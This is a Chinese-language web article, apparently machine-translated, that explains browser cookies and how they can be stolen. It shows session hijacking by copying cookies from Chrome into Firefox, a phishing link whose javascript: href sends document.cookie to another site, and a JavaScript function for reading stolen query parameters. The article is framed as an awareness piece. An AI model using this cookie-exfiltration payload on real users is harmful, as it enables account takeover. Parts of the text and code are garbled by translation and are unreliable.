点击链接后,原力项目信息就被泄露。他们是如何做到的呢?
随着互联网的普及和一系列可以接入互联网的设备的快速发展,截至2022年12月,中国网民规模已达10.37亿,较2021年12月增加3549万,互联网普及率率达到75.6%;这么大的一个国家,数据背后有多少用户的个人信息被泄露?
1.信息泄露的常见场景1.1手机号码泄露造成骚扰短信或电话1.2不同平台账号被盗用,群发非法信息2.Cookie2.1什么是cookie2.2登录访问流程网站2.3如何跨浏览器使用cookie3.信息如何泄露?3.1点击未知链接3.1通过JS获取cookie3.2从地址栏获取参数并拦截一、信息泄露常见场景
备注:来源网络
二、cookie
在介绍之前,我们首先要了解一下cookie是什么。类型是“小文本文件”。它是一些网站为了识别用户身份和进行会话跟踪而存储在用户本地终端上的数据,由用户客户端计算机临时或永久保存的信息。
例如,网站可以为每个访问者生成一个唯一的ID,然后以cookie文件的形式将其存储在每个用户的计算机上。如果您使用浏览器访问网络,您将看到硬盘驱动器上保存的所有cookie。
该文件夹中的每个文件都是由“名称/值”对组成的文本文件,还有一个文件保存所有相应网站的信息。这里的每个cookie文件都是一个简单普通的文本文件。通过文件名可以看出是哪个网站在机器上放置了cookie。
所谓“cookie”数据是指一些网站为了识别用户身份而在用户本地终端上存储的数据,由用户的客户端计算机临时或永久保存的。
通俗地说,就是缓存的数据,包括用户名、密码、注册账户、手机号码等公民个人信息。
百科上的介绍
下面的流程演示我们以百度为例。
场景是这样的:昨天我用百度APP浏览了一些我很感兴趣的内容,今天我想在电脑上再看一遍,但是我没有记下那些网址上网时的网址)习惯了)那么你只能通过在这个新终端中登录并查看历史浏览记录来达到这个效果。
用谷歌浏览器访问百度,发现没有登录,输入账号和密码,点击登录,信息验证成功后,返回cookie,页面跳转或刷新。下图为登录流程及成功后的页面显示。
那么如何查看cookie呢?
右键单击浏览器,然后单击检查
单击上面的应用程序选项卡
点击左侧的Cookies栏查看您浏览器的cookie信息
现在你可以看到百度的cookie信息,这些信息是按不同网站分类的。名称列和值列以类似于键值对的关系组合。
我也看到了饼干。现在我想访问我的个人中心。我需要跳转到该页面才能执行此操作。这个过程需要我重新登录吗?
显然它没有被使用。这是因为服务器检测到了这个有效的cookie,所以后续的一系列访问都会被允许顺利通过。
那么可以想象,如果这些信息被别人掌握了,是不是就意味着他们可以冒充我们的身份呢?
他一拍大腿:“断了!我是替补!”
市场上有多种浏览器可供用户选择,例如Google、Firefox、Edge等,但是不同浏览器之间读取cookie显然是不可行的。一个很简单的例子,现在我已经在百度上登录了我的账户,那么当我在火狐中访问百度时,我显然没有登录,因为不同浏览器的cookie是由各自的浏览器使用的。
假设,我在这里只是假设,假设你的目标在GoogleChrome上拦截了你的cookie,并通过另一个浏览器登录到你的帐户。他该怎么做呢?
首先,他右键火狐浏览器查看,点击存储,点击cookies,点击下面的全部删除,清除现有的cookies。
然后他打开你的谷歌Chrome浏览器,右键查看,点击应用,点击cookie,将百度服务器返回给你的cookie信息一一复制;
当然,您也可以使用浏览器插件批量导出。当您将其放入文本编辑器时,您可以看到这种JSON格式的数据。
在火狐浏览器中安装该插件,复制数据,点击导入,然后刷新页面。在火狐浏览器中可以看到登录成功,无需进行任何帐号和密码验证。这是否意味着他可以为所欲为?好的
三、信息是如何泄露的?
这个时候大家可能会说,我没有伙伴,没有人会拦截我的cookie。别太早胡说八道。我们先新建一个HTML文件,在里面放一个a标签,然后写一些非常诱人的句子。看起来你不想点击它吗?
ahref=''猜你喜欢,点击我有惊喜/a
首先,我们通过手动插入一些cookie来添加到此URL。右键查看,选择Application、Cookies,双击右侧添加cookie。
然后点击Console选项卡,输入[xss_clean]即可输出网站的所有cookie信息。
文档.cookie
这时我们再次修改上面的超链接,跳转到别人部署的网站,通过拼接地址栏参数将cookie带出去。
ahref='_javascript:location.href=''+[xss_clean]'猜你喜欢,点击我有惊喜/a
点击超链接,可以在地址栏中看到我们刚刚添加到该URL中的cookie信息以参数的形式被继承下来。
既然我们已经携带了自己的信息,跳转到了别有用心的人的网站,那么他如何通过JS获取地址栏参数呢?
函数GetQueryString(name){varreg=newRegExp('(^|)'+name+'=([^]*)(|$)');varr=_window.location.search.substr(1)。匹配;if(r!=null)returnunescape(r[2]);returnnull;}//调用方法alert(GetQueryString('参数名称1'));
可以说,事已至此,已经不可逆转。这也是你经常收到骚扰电话、短信、账号被盗提醒的原因之一。希望大家在上网时保护好自己的个人信息。
大家好,今天小编关注到一个比较有意思的话题,就是关于模拟电脑软件学信息怎么学的问题,于是小编就整理了3个相关介绍模拟电脑软件学信息怎么学的解答,让我们一起看看吧…
大家好,今天小编关注到一个比较有意思的话题,就是关于学信息学最便宜电脑的问题,于是小编就整理了4个相关介绍学信息学最便宜电脑的解答,让我们一起看看吧。做生物信息…
大家好,今天小编关注到一个比较有意思的话题,就是关于初中开始学电脑信息学的问题,于是小编就整理了3个相关介绍初中开始学电脑信息学的解答,让我们一起看看吧。大家感…
大家好,今天小编关注到一个比较有意思的话题,就是关于学信息学配什么电脑的问题,于是小编就整理了3个相关介绍学信息学配什么电脑的解答,让我们一起看看吧。地理信息系…
大家好,今天小编关注到一个比较有意思的话题,就是关于学设计华为电脑的问题,于是小编就整理了4个相关介绍学设计华为电脑的解答,让我们一起看看吧。华为电脑登录界面的…
2024-10-29 22:57:07
2024-10-29 21:03:07
2024-10-29 18:54:04
2024-10-29 16:42:40
2024-10-29 14:48:15
大家好,今天小编关注到一个比较有意思的话题,就是关于起电脑培训中心的名字的问题,…
大家好,今天小编关注到一个比较有意思的话题,就是关于培训学校清明体验课的问题,于…